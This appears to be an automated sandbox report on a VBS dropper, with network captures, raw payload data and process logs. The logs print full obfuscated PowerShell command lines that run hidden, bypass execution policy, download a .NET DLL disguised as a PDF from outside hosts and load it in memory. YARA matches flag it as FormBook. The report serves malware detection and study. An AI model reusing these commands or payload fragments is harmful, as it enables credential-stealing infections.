41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4e 54 6b 36 6c 71 63 64 4e 4a 4c 72 38 6e 77 5a 57 76 2f 6d 65 65 67 67 31 4f 42 54 53 45 47 66 4c 45 62 47 58 72 57 58 67 4c 4f 74 78 77 49 4d 45 56 73 61 4f 56 71 79 6b 2f 76 5a 48 54 59 78 6e 48 6d 34 41 47 5a 7a 55 56 36 44 49 37 38 32 75 2b 47 54 74 34 76 59 31 53 46 5a 76 32 44 73 4a 39 36 46 41 6d 41 32 41 35 70 72 51 53 46 74 4e 6e 78 50 43 68 6d 65 7a 76 58 54 75 65 6c 4d 44 72 52 2b 37 70 66 75 2f 4d 6a 4b 45 53 67 4f 69 75 32 4f 6c 44 7a 73 52 71 74 48 31 6e 6b 73 34 67 35 42 4f 67 7a 77 56 76 44 74 46 46 79 57 6c 33 76 75 57 6c 71 6d 73 49 44 77 67 44 78 44 64 6d 33 4f 53 51 6f 2f 2f 70 4c 78 4d 68 55 7a 6f 36 72 49 32 50 75 38 67 65 72 33 34 6b 52 2f 6f 49 4a 6b 72 45 55 30 79 4f 61 72 32 2b 74 6e 4f 66 67 38 32 6b 76 4b 4f 32 5a 78 58 57 58 4f 39 34 4d 30 78 55 56 33 6c 65 2b 48 73 4d 56 48 6b 55 4d 61 52 51 2b 6e 77 42 33 64 62 46 63 51 38 32 70 61 54 58 39 47 55 35 6f 63 6e 72 38 33 78 52 39 42 30 58 67 41 77 31 42 2b 6f 6c 52 61 6a 70 54 69 6c 79 56 43 73 59 4c 72 59 53 38 4a 65 53 68 64 68 50 6c 33 78 35 6a 34 2f 76 43 68 52
                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANTk6lqcdNJLr8nwZWv/meegg1OBTSEGfLEbGXrWXgLOtxwIMEVsaOVqyk/vZHTYxnHm4AGZzUV6DI782u+GTt4vY1SFZv2DsJ96FAmA2A5prQSFtNnxPChmezvXTuelMDrR+7pfu/MjKESgOiu2OlDzsRqtH1nks4g5BOgzwVvDtFFyWl3vuWlqmsIDwgDxDdm3OSQo//pLxMhUzo6rI2Pu8ger34kR/oIJkrEU0yOar2+tnOfg82kvKO2ZxXWXO94M0xUV3le+HsMVHkUMaRQ+nwB3dbFcQ82paTX9GU5ocnr83xR9B0XgAw1B+olRajpTilyVCsYLrYS8JeShdhPl3x5j4/vChR


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.54977820.106.232.480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampkBytes transferredDirectionData
                        May 27, 2022 21:16:25.235753059 CEST1219OUTGET /dll/26-05-2022-StartUp.pdf HTTP/1.1
                        Host: 20.106.232.4
                        Connection: Keep-Alive
                        May 27, 2022 21:16:25.336054087 CEST1220INHTTP/1.1 200 OK
                        Date: Fri, 27 May 2022 19:16:25 GMT
                        Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                        Last-Modified: Thu, 26 May 2022 14:26:51 GMT
                        ETag: "3aac-5dfeafb144fa1"
                        Accept-Ranges: bytes
                        Content-Length: 15020
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/pdf
                        Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 38 49 41 41 41 4b 4b 69 35 2b 41 77 41 41 42 47 38 4a 41 41 41 4b 4b 69 35 2b 42 41 41 41 42 47 38 4b 41 41 41 4b 4b 74 4a 2b 42 67 41 41 42 42 51 6f 46 67 41 41 43 6a 6b 65 41 41 41 41 63 67 45 41 41 48 44 51 42 77 41 41 41 69 67 4f 41 41 41 4b 62 78 63 41 41 41 70 7a 47 41 41 41 43 6f 41 47 41 41 41 45 66 67 59 41 41 41 51 71 41 41 41 41 47 6e 34 48 41 41 41 45 4b 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAC4QNpAAAAAAAAAAAOAADiELAVAAACQAAAAGAAAAAAAArkIAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBCAABLAAAAAGAAAMADAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAcQgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtCIAAAAgAAAAJAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAMADAAAAYAAAAAQAAAAmAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAAKgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACQQgAAAAAAAEgAAAACAAUAXCQAAAgdAAADAAAAAAAAAGRBAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAgAACiqmcwMAAAqAAQAABHMEAAAKgAIAAARzBQAACoADAAAEcwYAAAqABAAABCoAAC5+AQAABG8HAAAKKi5+AgAABG8IAAAKKi5+AwAABG8JAAAKKi5+BAAABG8KAAAKKtJ+BgAABBQoFgAACjkeAAAAcgEAAHDQBwAAAigOAAAKbxcAAApzGAAACoAGAAAEfgYAAAQqAAAAGn4HAAAEKgA
                        May 27, 2022 21:16:26.283740044 CEST1236OUTGET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1
                        Host: 20.106.232.4
                        May 27, 2022 21:16:26.384262085 CEST1241INHTTP/1.1 200 OK
                        Date: Fri, 27 May 2022 19:16:26 GMT
                        Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                        Last-Modified: Thu, 26 May 2022 14:25:11 GMT
                        ETag: "1a580-5dfeaf520524a"
                        Accept-Ranges: bytes
                        Content-Length: 107904
                        Content-Type: application/pdf
                        Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96
                        Data Ascii:


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.5497802.56.57.2280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampkBytes transferredDirectionData
                        May 27, 2022 21:16:26.619371891 CEST1353OUTGET /tsdfguhijk.txt HTTP/1.1
                        Host: 2.56.57.22
                        Connection: Keep-Alive
                        May 27, 2022 21:16:26.648276091 CEST1354INHTTP/1.1 200 OK
                        Content-Type: text/plain
                        Last-Modified: Fri, 27 May 2022 16:54:25 GMT
                        Accept-Ranges: bytes
                        ETag: "8aa6206cea71d81:0"
                        Server: Microsoft-IIS/10.0
                        Date: Fri, 27 May 2022 19:16:26 GMT
                        Content-Length: 225280
                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4e 54 6b 36 6c 71 63 64 4e 4a 4c 72 38 6e 77 5a 57 76 2f 6d 65 65 67 67 31 4f 42 54 53 45 47 66 4c 45 62 47 58 72 57 58 67 4c 4f 74 78 77 49 4d 45 56 73 61 4f 56 71 79 6b 2f 76 5a 48 54 59 78 6e 48 6d 34 41 47 5a 7a 55 56 36 44 49 37 38 32 75 2b 47 54 74 34 76 59 31 53 46 5a 76 32 44 73 4a 39 36 46 41 6d 41 32 41 35 70 72 51 53 46 74 4e 6e 78 50 43 68 6d 65 7a 76 58 54 75 65 6c 4d 44 72 52 2b 37 70 66 75 2f 4d 6a 4b 45 53 67 4f 69 75 32 4f 6c 44 7a 73 52 71 74 48 31 6e 6b 73 34 67 35 42 4f 67 7a 77 56 76 44 74 46 46 79 57 6c 33 76 75 57 6c 71 6d 73 49 44 77 67 44 78 44 64 6d 33 4f 53 51 6f 2f 2f 70 4c 78 4d 68 55 7a 6f 36 72 49 32 50 75 38 67 65 72 33 34 6b 52 2f 6f 49 4a 6b 72 45 55 30 79 4f 61 72 32 2b 74 6e 4f 66 67 38 32 6b 76 4b 4f 32 5a 78 58 57 58 4f 39 34 4d 30 78 55 56 33 6c 65 2b 48 73 4d 56 48 6b 55 4d 61 52 51 2b 6e 77 42 33 64 62 46 63 51 38 32 70 61 54 58 39 47 55 35 6f 63 6e 72 38 33 78 52 39 42 30 58 67 41 77 31 42 2b 6f 6c 52 61 6a 70 54 69 6c 79 56 43 73 59 4c 72 59 53 38 4a 65 53 68 64 68 50 6c 33 78 35 6a 34 2f 76 43 68 52
                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANTk6lqcdNJLr8nwZWv/meegg1OBTSEGfLEbGXrWXgLOtxwIMEVsaOVqyk/vZHTYxnHm4AGZzUV6DI782u+GTt4vY1SFZv2DsJ96FAmA2A5prQSFtNnxPChmezvXTuelMDrR+7pfu/MjKESgOiu2OlDzsRqtH1nks4g5BOgzwVvDtFFyWl3vuWlqmsIDwgDxDdm3OSQo//pLxMhUzo6rI2Pu8ger34kR/oIJkrEU0yOar2+tnOfg82kvKO2ZxXWXO94M0xUV3le+HsMVHkUMaRQ+nwB3dbFcQ82paTX9GU5ocnr83xR9B0XgAw1B+olRajpTilyVCsYLrYS8JeShdhPl3x5j4/vChR


                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:2
                        Start time:21:15:18
                        Start date:27/05/2022
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
                        Imagebase:0x7ff7d64c0000
                        File size:163840 bytes
                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:4
                        Start time:21:15:20
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Target ID:5
                        Start time:21:15:21
                        Start date:27/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff77f440000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:6
                        Start time:21:15:25
                        Start date:27/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
                        Imagebase:0x7ff619710000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                        • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
